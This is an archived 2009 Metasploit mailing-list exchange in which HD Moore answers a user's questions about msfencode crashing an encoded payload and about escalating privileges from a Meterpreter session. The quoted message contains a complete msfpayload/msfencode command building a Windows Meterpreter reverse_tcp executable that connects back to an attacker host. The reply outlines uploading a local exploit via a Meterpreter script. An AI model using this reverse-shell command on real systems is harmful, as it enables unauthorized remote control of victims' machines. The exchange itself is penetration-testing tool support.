Questions...

[hdm at metasploit.com (HD Moore)]

On Fri, 26 Jun 2009 03:08:10 -0500, Karlsson Anders  
<anders.karlsson at atea.se> wrote:
> First I am having some problems with msfencode. When creating a payload  
> the exe file does not work (I am not getting any connection back to my  
> computer from victim) and I can see that the exe file starts and  
> closes/crashes? in Windows Task Manager on "victim".
>
> I am using the command:
> ./msfpayload windows/meterpreter/reverse_tcp LHOST=(my_attacker_ip)  
> LPORT=80 R | ./msfencode -b ' ' -t exe -o /tmp/reverse.exe
>
> If I create the same payload without using msfencode (old style) the exe  
> file works perfectly! What am I doing wrong with msfencode?

We have made a ton changes lately, it wouldn't be surprising if something  
broke. I just tested the latest revision on WinXP SP3, everything checks  
out OK there with the reverse payload and the same command line. One known  
bug right is that Windows 2000 support is broken in the bind|reverse  
stagers, this was introduced when Windows 7 support was added and should  
be fixed very soon. In your command line above, you are specifying 0x20 as  
your "bad character" for the -b argument, is this intentional?


> Sometimes a victim is not local admin on his machine (when running a  
> payload like above, without exploitation).  How can I run "local  
> exploits" on that machine from a meterpreter session like the "Local  
> Privilege Escalation attacks" in Core Impact?  I want to be admin you  
> know....

The quick answer is write a Meterpreter script that uploads the executable  
implementing the local exploit and runs it. The Meterpreter API provides  
most of the functionality you need, and you can even build local priv  
escalation attacks as Meterpreter extensions.

-HD